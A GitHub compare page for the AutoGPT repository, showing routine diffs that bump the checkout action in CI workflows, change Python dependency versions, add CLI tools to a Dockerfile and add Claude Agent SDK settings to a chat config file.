mirror of
https://github.com/Significant-Gravitas/AutoGPT.git
synced 2026-02-12 07:45:14 -05:00
Compare commits
65 Commits
chore/comb
...
feat/copit
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
d7f7a2747f | ||
|
|
68849e197c | ||
|
|
211478bb29 | ||
|
|
0e88dd15b2 | ||
|
|
7f3c227f0a | ||
|
|
40b58807ab | ||
|
|
d0e2e6f013 | ||
|
|
efdc8d73cc | ||
|
|
a34810d8a2 | ||
|
|
038b7d5841 | ||
|
|
cac93b0cc9 | ||
|
|
2025aaf5f2 | ||
|
|
ae9bce3bae | ||
|
|
3107d889fc | ||
|
|
f174fb6303 | ||
|
|
920a4c5f15 | ||
|
|
e95fadbb86 | ||
|
|
b14b3803ad | ||
|
|
36aeb0b2b3 | ||
|
|
2a189c44c4 | ||
|
|
508759610f | ||
|
|
062fe1aa70 | ||
|
|
82c483d6c8 | ||
|
|
7cffa1895f | ||
|
|
9791bdd724 | ||
|
|
750a674c78 | ||
|
|
960c7980a3 | ||
|
|
e85d437bb2 | ||
|
|
2cd0d4fe0f | ||
|
|
44f9536bd6 | ||
|
|
1c1085a227 | ||
|
|
d7ef70469e | ||
|
|
1926127ddd | ||
|
|
8b509e56de | ||
|
|
acb2d0bd1b | ||
|
|
51aa369c80 | ||
|
|
6403ffe353 | ||
|
|
c40a98ba3c | ||
|
|
a31fc8b162 | ||
|
|
0f2d1a6553 | ||
|
|
87d817b83b | ||
|
|
acf932bf4f | ||
|
|
f562d9a277 | ||
|
|
3c92a96504 | ||
|
|
8b8e1df739 | ||
|
|
602a0a4fb1 | ||
|
|
8d7d531ae0 | ||
|
|
43153a12e0 | ||
|
|
587e11c60a | ||
|
|
57da545e02 | ||
|
|
626980bf27 | ||
|
|
e42b27af3c | ||
|
|
34face15d2 | ||
|
|
7d32c83f95 | ||
|
|
6e2a45b84e | ||
|
|
32f6532e9c | ||
|
|
0bbe8a184d | ||
|
|
7592deed63 | ||
|
|
b9c759ce4f | ||
|
|
5efb80d47b | ||
|
|
b49d8e2cba | ||
|
|
452544530d | ||
|
|
32ee7e6cf8 | ||
|
|
670663c406 | ||
|
|
0dbe4cf51e |
@@ -22,7 +22,7 @@ jobs:
|
|||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
ref: ${{ github.event.workflow_run.head_branch }}
|
ref: ${{ github.event.workflow_run.head_branch }}
|
||||||
fetch-depth: 0
|
fetch-depth: 0
|
||||||
|
|||||||
2
.github/workflows/claude-dependabot.yml
vendored
2
.github/workflows/claude-dependabot.yml
vendored
@@ -30,7 +30,7 @@ jobs:
|
|||||||
actions: read # Required for CI access
|
actions: read # Required for CI access
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
fetch-depth: 1
|
fetch-depth: 1
|
||||||
|
|
||||||
|
|||||||
2
.github/workflows/claude.yml
vendored
2
.github/workflows/claude.yml
vendored
@@ -40,7 +40,7 @@ jobs:
|
|||||||
actions: read # Required for CI access
|
actions: read # Required for CI access
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
fetch-depth: 1
|
fetch-depth: 1
|
||||||
|
|
||||||
|
|||||||
2
.github/workflows/codeql.yml
vendored
2
.github/workflows/codeql.yml
vendored
@@ -58,7 +58,7 @@ jobs:
|
|||||||
# your codebase is analyzed, see https://docs.github.com/en/code-security/code-scanning/creating-an-advanced-setup-for-code-scanning/codeql-code-scanning-for-compiled-languages
|
# your codebase is analyzed, see https://docs.github.com/en/code-security/code-scanning/creating-an-advanced-setup-for-code-scanning/codeql-code-scanning-for-compiled-languages
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout repository
|
- name: Checkout repository
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
|
|
||||||
# Initializes the CodeQL tools for scanning.
|
# Initializes the CodeQL tools for scanning.
|
||||||
- name: Initialize CodeQL
|
- name: Initialize CodeQL
|
||||||
|
|||||||
2
.github/workflows/copilot-setup-steps.yml
vendored
2
.github/workflows/copilot-setup-steps.yml
vendored
@@ -27,7 +27,7 @@ jobs:
|
|||||||
# If you do not check out your code, Copilot will do this for you.
|
# If you do not check out your code, Copilot will do this for you.
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
fetch-depth: 0
|
fetch-depth: 0
|
||||||
submodules: true
|
submodules: true
|
||||||
|
|||||||
2
.github/workflows/docs-block-sync.yml
vendored
2
.github/workflows/docs-block-sync.yml
vendored
@@ -23,7 +23,7 @@ jobs:
|
|||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
fetch-depth: 1
|
fetch-depth: 1
|
||||||
|
|
||||||
|
|||||||
2
.github/workflows/docs-claude-review.yml
vendored
2
.github/workflows/docs-claude-review.yml
vendored
@@ -23,7 +23,7 @@ jobs:
|
|||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
fetch-depth: 0
|
fetch-depth: 0
|
||||||
|
|
||||||
|
|||||||
2
.github/workflows/docs-enhance.yml
vendored
2
.github/workflows/docs-enhance.yml
vendored
@@ -28,7 +28,7 @@ jobs:
|
|||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
fetch-depth: 1
|
fetch-depth: 1
|
||||||
|
|
||||||
|
|||||||
@@ -25,7 +25,7 @@ jobs:
|
|||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
ref: ${{ github.event.inputs.git_ref || github.ref_name }}
|
ref: ${{ github.event.inputs.git_ref || github.ref_name }}
|
||||||
|
|
||||||
|
|||||||
@@ -17,7 +17,7 @@ jobs:
|
|||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout code
|
- name: Checkout code
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
ref: ${{ github.ref_name || 'master' }}
|
ref: ${{ github.ref_name || 'master' }}
|
||||||
|
|
||||||
|
|||||||
2
.github/workflows/platform-backend-ci.yml
vendored
2
.github/workflows/platform-backend-ci.yml
vendored
@@ -68,7 +68,7 @@ jobs:
|
|||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout repository
|
- name: Checkout repository
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
fetch-depth: 0
|
fetch-depth: 0
|
||||||
submodules: true
|
submodules: true
|
||||||
|
|||||||
10
.github/workflows/platform-frontend-ci.yml
vendored
10
.github/workflows/platform-frontend-ci.yml
vendored
@@ -31,7 +31,7 @@ jobs:
|
|||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout repository
|
- name: Checkout repository
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
|
|
||||||
- name: Check for component changes
|
- name: Check for component changes
|
||||||
uses: dorny/paths-filter@v3
|
uses: dorny/paths-filter@v3
|
||||||
@@ -71,7 +71,7 @@ jobs:
|
|||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout repository
|
- name: Checkout repository
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
|
|
||||||
- name: Set up Node.js
|
- name: Set up Node.js
|
||||||
uses: actions/setup-node@v6
|
uses: actions/setup-node@v6
|
||||||
@@ -107,7 +107,7 @@ jobs:
|
|||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout repository
|
- name: Checkout repository
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
fetch-depth: 0
|
fetch-depth: 0
|
||||||
|
|
||||||
@@ -148,7 +148,7 @@ jobs:
|
|||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout repository
|
- name: Checkout repository
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
submodules: recursive
|
submodules: recursive
|
||||||
|
|
||||||
@@ -277,7 +277,7 @@ jobs:
|
|||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout repository
|
- name: Checkout repository
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
submodules: recursive
|
submodules: recursive
|
||||||
|
|
||||||
|
|||||||
4
.github/workflows/platform-fullstack-ci.yml
vendored
4
.github/workflows/platform-fullstack-ci.yml
vendored
@@ -29,7 +29,7 @@ jobs:
|
|||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout repository
|
- name: Checkout repository
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
|
|
||||||
- name: Set up Node.js
|
- name: Set up Node.js
|
||||||
uses: actions/setup-node@v6
|
uses: actions/setup-node@v6
|
||||||
@@ -63,7 +63,7 @@ jobs:
|
|||||||
|
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout repository
|
- name: Checkout repository
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v6
|
||||||
with:
|
with:
|
||||||
submodules: recursive
|
submodules: recursive
|
||||||
|
|
||||||
|
|||||||
2
.github/workflows/repo-workflow-checker.yml
vendored
2
.github/workflows/repo-workflow-checker.yml
vendored
@@ -11,7 +11,7 @@ jobs:
|
|||||||
steps:
|
steps:
|
||||||
# - name: Wait some time for all actions to start
|
# - name: Wait some time for all actions to start
|
||||||
# run: sleep 30
|
# run: sleep 30
|
||||||
- uses: actions/checkout@v4
|
- uses: actions/checkout@v6
|
||||||
# with:
|
# with:
|
||||||
# fetch-depth: 0
|
# fetch-depth: 0
|
||||||
- name: Set up Python
|
- name: Set up Python
|
||||||
|
|||||||
77
autogpt_platform/autogpt_libs/poetry.lock
generated
77
autogpt_platform/autogpt_libs/poetry.lock
generated
@@ -1062,14 +1062,14 @@ urllib3 = ">=1.26.0,<3"
|
|||||||
|
|
||||||
[[package]]
|
[[package]]
|
||||||
name = "launchdarkly-server-sdk"
|
name = "launchdarkly-server-sdk"
|
||||||
version = "9.15.0"
|
version = "9.14.1"
|
||||||
description = "LaunchDarkly SDK for Python"
|
description = "LaunchDarkly SDK for Python"
|
||||||
optional = false
|
optional = false
|
||||||
python-versions = ">=3.10"
|
python-versions = ">=3.9"
|
||||||
groups = ["main"]
|
groups = ["main"]
|
||||||
files = [
|
files = [
|
||||||
{file = "launchdarkly_server_sdk-9.15.0-py3-none-any.whl", hash = "sha256:c267e29bfa3fb5e2a06a208448ada6ed5557a2924979b8d79c970b45d227c668"},
|
{file = "launchdarkly_server_sdk-9.14.1-py3-none-any.whl", hash = "sha256:a9e2bd9ecdef845cd631ae0d4334a1115e5b44257c42eb2349492be4bac7815c"},
|
||||||
{file = "launchdarkly_server_sdk-9.15.0.tar.gz", hash = "sha256:f31441b74bc1a69c381db57c33116509e407a2612628ad6dff0a7dbb39d5020b"},
|
{file = "launchdarkly_server_sdk-9.14.1.tar.gz", hash = "sha256:1df44baf0a0efa74d8c1dad7a00592b98bce7d19edded7f770da8dbc49922213"},
|
||||||
]
|
]
|
||||||
|
|
||||||
[package.dependencies]
|
[package.dependencies]
|
||||||
@@ -1478,14 +1478,14 @@ testing = ["coverage", "pytest", "pytest-benchmark"]
|
|||||||
|
|
||||||
[[package]]
|
[[package]]
|
||||||
name = "postgrest"
|
name = "postgrest"
|
||||||
version = "2.28.0"
|
version = "2.27.2"
|
||||||
description = "PostgREST client for Python. This library provides an ORM interface to PostgREST."
|
description = "PostgREST client for Python. This library provides an ORM interface to PostgREST."
|
||||||
optional = false
|
optional = false
|
||||||
python-versions = ">=3.9"
|
python-versions = ">=3.9"
|
||||||
groups = ["main"]
|
groups = ["main"]
|
||||||
files = [
|
files = [
|
||||||
{file = "postgrest-2.28.0-py3-none-any.whl", hash = "sha256:7bca2f24dd1a1bf8a3d586c7482aba6cd41662da6733045fad585b63b7f7df75"},
|
{file = "postgrest-2.27.2-py3-none-any.whl", hash = "sha256:1666fef3de05ca097a314433dd5ae2f2d71c613cb7b233d0f468c4ffe37277da"},
|
||||||
{file = "postgrest-2.28.0.tar.gz", hash = "sha256:c36b38646d25ea4255321d3d924ce70f8d20ec7799cb42c1221d6a818d4f6515"},
|
{file = "postgrest-2.27.2.tar.gz", hash = "sha256:55407d530b5af3d64e883a71fec1f345d369958f723ce4a8ab0b7d169e313242"},
|
||||||
]
|
]
|
||||||
|
|
||||||
[package.dependencies]
|
[package.dependencies]
|
||||||
@@ -2135,21 +2135,21 @@ files = [
|
|||||||
|
|
||||||
[[package]]
|
[[package]]
|
||||||
name = "pytest"
|
name = "pytest"
|
||||||
version = "9.0.2"
|
version = "8.4.1"
|
||||||
description = "pytest: simple powerful testing with Python"
|
description = "pytest: simple powerful testing with Python"
|
||||||
optional = false
|
optional = false
|
||||||
python-versions = ">=3.10"
|
python-versions = ">=3.9"
|
||||||
groups = ["dev"]
|
groups = ["dev"]
|
||||||
files = [
|
files = [
|
||||||
{file = "pytest-9.0.2-py3-none-any.whl", hash = "sha256:711ffd45bf766d5264d487b917733b453d917afd2b0ad65223959f59089f875b"},
|
{file = "pytest-8.4.1-py3-none-any.whl", hash = "sha256:539c70ba6fcead8e78eebbf1115e8b589e7565830d7d006a8723f19ac8a0afb7"},
|
||||||
{file = "pytest-9.0.2.tar.gz", hash = "sha256:75186651a92bd89611d1d9fc20f0b4345fd827c41ccd5c299a868a05d70edf11"},
|
{file = "pytest-8.4.1.tar.gz", hash = "sha256:7c67fd69174877359ed9371ec3af8a3d2b04741818c51e5e99cc1742251fa93c"},
|
||||||
]
|
]
|
||||||
|
|
||||||
[package.dependencies]
|
[package.dependencies]
|
||||||
colorama = {version = ">=0.4", markers = "sys_platform == \"win32\""}
|
colorama = {version = ">=0.4", markers = "sys_platform == \"win32\""}
|
||||||
exceptiongroup = {version = ">=1", markers = "python_version < \"3.11\""}
|
exceptiongroup = {version = ">=1", markers = "python_version < \"3.11\""}
|
||||||
iniconfig = ">=1.0.1"
|
iniconfig = ">=1"
|
||||||
packaging = ">=22"
|
packaging = ">=20"
|
||||||
pluggy = ">=1.5,<2"
|
pluggy = ">=1.5,<2"
|
||||||
pygments = ">=2.7.2"
|
pygments = ">=2.7.2"
|
||||||
tomli = {version = ">=1", markers = "python_version < \"3.11\""}
|
tomli = {version = ">=1", markers = "python_version < \"3.11\""}
|
||||||
@@ -2248,14 +2248,14 @@ cli = ["click (>=5.0)"]
|
|||||||
|
|
||||||
[[package]]
|
[[package]]
|
||||||
name = "realtime"
|
name = "realtime"
|
||||||
version = "2.28.0"
|
version = "2.27.2"
|
||||||
description = ""
|
description = ""
|
||||||
optional = false
|
optional = false
|
||||||
python-versions = ">=3.9"
|
python-versions = ">=3.9"
|
||||||
groups = ["main"]
|
groups = ["main"]
|
||||||
files = [
|
files = [
|
||||||
{file = "realtime-2.28.0-py3-none-any.whl", hash = "sha256:db1bd59bab9b1fcc9f9d3b1a073bed35bf4994d720e6751f10031a58d57a3836"},
|
{file = "realtime-2.27.2-py3-none-any.whl", hash = "sha256:34a9cbb26a274e707e8fc9e3ee0a66de944beac0fe604dc336d1e985db2c830f"},
|
||||||
{file = "realtime-2.28.0.tar.gz", hash = "sha256:d18cedcebd6a8f22fcd509bc767f639761eb218b7b2b6f14fc4205b6259b50fc"},
|
{file = "realtime-2.27.2.tar.gz", hash = "sha256:b960a90294d2cea1b3f1275ecb89204304728e08fff1c393cc1b3150739556b3"},
|
||||||
]
|
]
|
||||||
|
|
||||||
[package.dependencies]
|
[package.dependencies]
|
||||||
@@ -2265,21 +2265,20 @@ websockets = ">=11,<16"
|
|||||||
|
|
||||||
[[package]]
|
[[package]]
|
||||||
name = "redis"
|
name = "redis"
|
||||||
version = "7.1.1"
|
version = "6.2.0"
|
||||||
description = "Python client for Redis database and key-value store"
|
description = "Python client for Redis database and key-value store"
|
||||||
optional = false
|
optional = false
|
||||||
python-versions = ">=3.10"
|
python-versions = ">=3.9"
|
||||||
groups = ["main"]
|
groups = ["main"]
|
||||||
files = [
|
files = [
|
||||||
{file = "redis-7.1.1-py3-none-any.whl", hash = "sha256:f77817f16071c2950492c67d40b771fa493eb3fccc630a424a10976dbb794b7a"},
|
{file = "redis-6.2.0-py3-none-any.whl", hash = "sha256:c8ddf316ee0aab65f04a11229e94a64b2618451dab7a67cb2f77eb799d872d5e"},
|
||||||
{file = "redis-7.1.1.tar.gz", hash = "sha256:a2814b2bda15b39dad11391cc48edac4697214a8a5a4bd10abe936ab4892eb43"},
|
{file = "redis-6.2.0.tar.gz", hash = "sha256:e821f129b75dde6cb99dd35e5c76e8c49512a5a0d8dfdc560b2fbd44b85ca977"},
|
||||||
]
|
]
|
||||||
|
|
||||||
[package.dependencies]
|
[package.dependencies]
|
||||||
async-timeout = {version = ">=4.0.3", markers = "python_full_version < \"3.11.3\""}
|
async-timeout = {version = ">=4.0.3", markers = "python_full_version < \"3.11.3\""}
|
||||||
|
|
||||||
[package.extras]
|
[package.extras]
|
||||||
circuit-breaker = ["pybreaker (>=1.4.0)"]
|
|
||||||
hiredis = ["hiredis (>=3.2.0)"]
|
hiredis = ["hiredis (>=3.2.0)"]
|
||||||
jwt = ["pyjwt (>=2.9.0)"]
|
jwt = ["pyjwt (>=2.9.0)"]
|
||||||
ocsp = ["cryptography (>=36.0.1)", "pyopenssl (>=20.0.1)", "requests (>=2.31.0)"]
|
ocsp = ["cryptography (>=36.0.1)", "pyopenssl (>=20.0.1)", "requests (>=2.31.0)"]
|
||||||
@@ -2437,14 +2436,14 @@ full = ["httpx (>=0.27.0,<0.29.0)", "itsdangerous", "jinja2", "python-multipart
|
|||||||
|
|
||||||
[[package]]
|
[[package]]
|
||||||
name = "storage3"
|
name = "storage3"
|
||||||
version = "2.28.0"
|
version = "2.27.2"
|
||||||
description = "Supabase Storage client for Python."
|
description = "Supabase Storage client for Python."
|
||||||
optional = false
|
optional = false
|
||||||
python-versions = ">=3.9"
|
python-versions = ">=3.9"
|
||||||
groups = ["main"]
|
groups = ["main"]
|
||||||
files = [
|
files = [
|
||||||
{file = "storage3-2.28.0-py3-none-any.whl", hash = "sha256:ecb50efd2ac71dabbdf97e99ad346eafa630c4c627a8e5a138ceb5fbbadae716"},
|
{file = "storage3-2.27.2-py3-none-any.whl", hash = "sha256:e6f16e7a260729e7b1f46e9bf61746805a02e30f5e419ee1291007c432e3ec63"},
|
||||||
{file = "storage3-2.28.0.tar.gz", hash = "sha256:bc1d008aff67de7a0f2bd867baee7aadbcdb6f78f5a310b4f7a38e8c13c19865"},
|
{file = "storage3-2.27.2.tar.gz", hash = "sha256:cb4807b7f86b4bb1272ac6fdd2f3cfd8ba577297046fa5f88557425200275af5"},
|
||||||
]
|
]
|
||||||
|
|
||||||
[package.dependencies]
|
[package.dependencies]
|
||||||
@@ -2488,35 +2487,35 @@ python-dateutil = ">=2.6.0"
|
|||||||
|
|
||||||
[[package]]
|
[[package]]
|
||||||
name = "supabase"
|
name = "supabase"
|
||||||
version = "2.28.0"
|
version = "2.27.2"
|
||||||
description = "Supabase client for Python."
|
description = "Supabase client for Python."
|
||||||
optional = false
|
optional = false
|
||||||
python-versions = ">=3.9"
|
python-versions = ">=3.9"
|
||||||
groups = ["main"]
|
groups = ["main"]
|
||||||
files = [
|
files = [
|
||||||
{file = "supabase-2.28.0-py3-none-any.whl", hash = "sha256:42776971c7d0ccca16034df1ab96a31c50228eb1eb19da4249ad2f756fc20272"},
|
{file = "supabase-2.27.2-py3-none-any.whl", hash = "sha256:d4dce00b3a418ee578017ec577c0e5be47a9a636355009c76f20ed2faa15bc54"},
|
||||||
{file = "supabase-2.28.0.tar.gz", hash = "sha256:aea299aaab2a2eed3c57e0be7fc035c6807214194cce795a3575add20268ece1"},
|
{file = "supabase-2.27.2.tar.gz", hash = "sha256:2aed40e4f3454438822442a1e94a47be6694c2c70392e7ae99b51a226d4293f7"},
|
||||||
]
|
]
|
||||||
|
|
||||||
[package.dependencies]
|
[package.dependencies]
|
||||||
httpx = ">=0.26,<0.29"
|
httpx = ">=0.26,<0.29"
|
||||||
postgrest = "2.28.0"
|
postgrest = "2.27.2"
|
||||||
realtime = "2.28.0"
|
realtime = "2.27.2"
|
||||||
storage3 = "2.28.0"
|
storage3 = "2.27.2"
|
||||||
supabase-auth = "2.28.0"
|
supabase-auth = "2.27.2"
|
||||||
supabase-functions = "2.28.0"
|
supabase-functions = "2.27.2"
|
||||||
yarl = ">=1.22.0"
|
yarl = ">=1.22.0"
|
||||||
|
|
||||||
[[package]]
|
[[package]]
|
||||||
name = "supabase-auth"
|
name = "supabase-auth"
|
||||||
version = "2.28.0"
|
version = "2.27.2"
|
||||||
description = "Python Client Library for Supabase Auth"
|
description = "Python Client Library for Supabase Auth"
|
||||||
optional = false
|
optional = false
|
||||||
python-versions = ">=3.9"
|
python-versions = ">=3.9"
|
||||||
groups = ["main"]
|
groups = ["main"]
|
||||||
files = [
|
files = [
|
||||||
{file = "supabase_auth-2.28.0-py3-none-any.whl", hash = "sha256:2ac85026cc285054c7fa6d41924f3a333e9ec298c013e5b5e1754039ba7caec9"},
|
{file = "supabase_auth-2.27.2-py3-none-any.whl", hash = "sha256:78ec25b11314d0a9527a7205f3b1c72560dccdc11b38392f80297ef98664ee91"},
|
||||||
{file = "supabase_auth-2.28.0.tar.gz", hash = "sha256:2bb8f18ff39934e44b28f10918db965659f3735cd6fbfcc022fe0b82dbf8233e"},
|
{file = "supabase_auth-2.27.2.tar.gz", hash = "sha256:0f5bcc79b3677cb42e9d321f3c559070cfa40d6a29a67672cc8382fb7dc2fe97"},
|
||||||
]
|
]
|
||||||
|
|
||||||
[package.dependencies]
|
[package.dependencies]
|
||||||
@@ -2526,14 +2525,14 @@ pyjwt = {version = ">=2.10.1", extras = ["crypto"]}
|
|||||||
|
|
||||||
[[package]]
|
[[package]]
|
||||||
name = "supabase-functions"
|
name = "supabase-functions"
|
||||||
version = "2.28.0"
|
version = "2.27.2"
|
||||||
description = "Library for Supabase Functions"
|
description = "Library for Supabase Functions"
|
||||||
optional = false
|
optional = false
|
||||||
python-versions = ">=3.9"
|
python-versions = ">=3.9"
|
||||||
groups = ["main"]
|
groups = ["main"]
|
||||||
files = [
|
files = [
|
||||||
{file = "supabase_functions-2.28.0-py3-none-any.whl", hash = "sha256:30bf2d586f8df285faf0621bb5d5bb3ec3157234fc820553ca156f009475e4ae"},
|
{file = "supabase_functions-2.27.2-py3-none-any.whl", hash = "sha256:db480efc669d0bca07605b9b6f167312af43121adcc842a111f79bea416ef754"},
|
||||||
{file = "supabase_functions-2.28.0.tar.gz", hash = "sha256:db3dddfc37aca5858819eb461130968473bd8c75bd284581013958526dac718b"},
|
{file = "supabase_functions-2.27.2.tar.gz", hash = "sha256:d0c8266207a94371cb3fd35ad3c7f025b78a97cf026861e04ccd35ac1775f80b"},
|
||||||
]
|
]
|
||||||
|
|
||||||
[package.dependencies]
|
[package.dependencies]
|
||||||
@@ -2912,4 +2911,4 @@ type = ["pytest-mypy"]
|
|||||||
[metadata]
|
[metadata]
|
||||||
lock-version = "2.1"
|
lock-version = "2.1"
|
||||||
python-versions = ">=3.10,<4.0"
|
python-versions = ">=3.10,<4.0"
|
||||||
content-hash = "3f738dbf158a0b9319387d7251cd557e8e143d4dec809c5ab720321d2b53e368"
|
content-hash = "40eae94995dc0a388fa832ed4af9b6137f28d5b5ced3aaea70d5f91d4d9a179d"
|
||||||
|
|||||||
@@ -13,17 +13,17 @@ cryptography = "^46.0"
|
|||||||
expiringdict = "^1.2.2"
|
expiringdict = "^1.2.2"
|
||||||
fastapi = "^0.128.0"
|
fastapi = "^0.128.0"
|
||||||
google-cloud-logging = "^3.13.0"
|
google-cloud-logging = "^3.13.0"
|
||||||
launchdarkly-server-sdk = "^9.15.0"
|
launchdarkly-server-sdk = "^9.14.1"
|
||||||
pydantic = "^2.12.5"
|
pydantic = "^2.12.5"
|
||||||
pydantic-settings = "^2.12.0"
|
pydantic-settings = "^2.12.0"
|
||||||
pyjwt = { version = "^2.11.0", extras = ["crypto"] }
|
pyjwt = { version = "^2.11.0", extras = ["crypto"] }
|
||||||
redis = "^7.1.1"
|
redis = "^6.2.0"
|
||||||
supabase = "^2.28.0"
|
supabase = "^2.27.2"
|
||||||
uvicorn = "^0.40.0"
|
uvicorn = "^0.40.0"
|
||||||
|
|
||||||
[tool.poetry.group.dev.dependencies]
|
[tool.poetry.group.dev.dependencies]
|
||||||
pyright = "^1.1.408"
|
pyright = "^1.1.408"
|
||||||
pytest = "^9.0.2"
|
pytest = "^8.4.1"
|
||||||
pytest-asyncio = "^1.3.0"
|
pytest-asyncio = "^1.3.0"
|
||||||
pytest-mock = "^3.15.1"
|
pytest-mock = "^3.15.1"
|
||||||
pytest-cov = "^7.0.0"
|
pytest-cov = "^7.0.0"
|
||||||
|
|||||||
@@ -62,12 +62,16 @@ ENV POETRY_HOME=/opt/poetry \
|
|||||||
DEBIAN_FRONTEND=noninteractive
|
DEBIAN_FRONTEND=noninteractive
|
||||||
ENV PATH=/opt/poetry/bin:$PATH
|
ENV PATH=/opt/poetry/bin:$PATH
|
||||||
|
|
||||||
# Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
|
# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use
|
||||||
|
# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
|
||||||
RUN apt-get update && apt-get install -y \
|
RUN apt-get update && apt-get install -y \
|
||||||
python3.13 \
|
python3.13 \
|
||||||
python3-pip \
|
python3-pip \
|
||||||
ffmpeg \
|
ffmpeg \
|
||||||
imagemagick \
|
imagemagick \
|
||||||
|
jq \
|
||||||
|
ripgrep \
|
||||||
|
tree \
|
||||||
&& rm -rf /var/lib/apt/lists/*
|
&& rm -rf /var/lib/apt/lists/*
|
||||||
|
|
||||||
# Copy only necessary files from builder
|
# Copy only necessary files from builder
|
||||||
|
|||||||
@@ -27,12 +27,11 @@ class ChatConfig(BaseSettings):
|
|||||||
session_ttl: int = Field(default=43200, description="Session TTL in seconds")
|
session_ttl: int = Field(default=43200, description="Session TTL in seconds")
|
||||||
|
|
||||||
# Streaming Configuration
|
# Streaming Configuration
|
||||||
max_context_messages: int = Field(
|
|
||||||
default=50, ge=1, le=200, description="Maximum context messages"
|
|
||||||
)
|
|
||||||
|
|
||||||
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
|
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
|
||||||
max_retries: int = Field(default=3, description="Maximum number of retries")
|
max_retries: int = Field(
|
||||||
|
default=3,
|
||||||
|
description="Max retries for fallback path (SDK handles retries internally)",
|
||||||
|
)
|
||||||
max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
|
max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
|
||||||
max_agent_schedules: int = Field(
|
max_agent_schedules: int = Field(
|
||||||
default=30, description="Maximum number of agent schedules"
|
default=30, description="Maximum number of agent schedules"
|
||||||
@@ -93,6 +92,17 @@ class ChatConfig(BaseSettings):
|
|||||||
description="Name of the prompt in Langfuse to fetch",
|
description="Name of the prompt in Langfuse to fetch",
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Claude Agent SDK Configuration
|
||||||
|
use_claude_agent_sdk: bool = Field(
|
||||||
|
default=True,
|
||||||
|
description="Use Claude Agent SDK for chat completions",
|
||||||
|
)
|
||||||
|
sdk_max_buffer_size: int = Field(
|
||||||
|
default=10 * 1024 * 1024, # 10MB (default SDK is 1MB)
|
||||||
|
description="Max buffer size in bytes for SDK JSON message parsing. "
|
||||||
|
"Increase if tool outputs exceed the limit.",
|
||||||
|
)
|
||||||
|
|
||||||
# Extended thinking configuration for Claude models
|
# Extended thinking configuration for Claude models
|
||||||
thinking_enabled: bool = Field(
|
thinking_enabled: bool = Field(
|
||||||
default=True,
|
default=True,
|
||||||
@@ -138,6 +148,17 @@ class ChatConfig(BaseSettings):
|
|||||||
v = os.getenv("CHAT_INTERNAL_API_KEY")
|
v = os.getenv("CHAT_INTERNAL_API_KEY")
|
||||||
return v
|
return v
|
||||||
|
|
||||||
|
@field_validator("use_claude_agent_sdk", mode="before")
|
||||||
|
@classmethod
|
||||||
|
def get_use_claude_agent_sdk(cls, v):
|
||||||
|
"""Get use_claude_agent_sdk from environment if not provided."""
|
||||||
|
# Check environment variable - default to True if not set
|
||||||
|
env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
|
||||||
|
if env_val:
|
||||||
|
return env_val in ("true", "1", "yes", "on")
|
||||||
|
# Default to True (SDK enabled by default)
|
||||||
|
return True if v is None else v
|
||||||
|
|
||||||
# Prompt paths for different contexts
|
# Prompt paths for different contexts
|
||||||
PROMPT_PATHS: dict[str, str] = {
|
PROMPT_PATHS: dict[str, str] = {
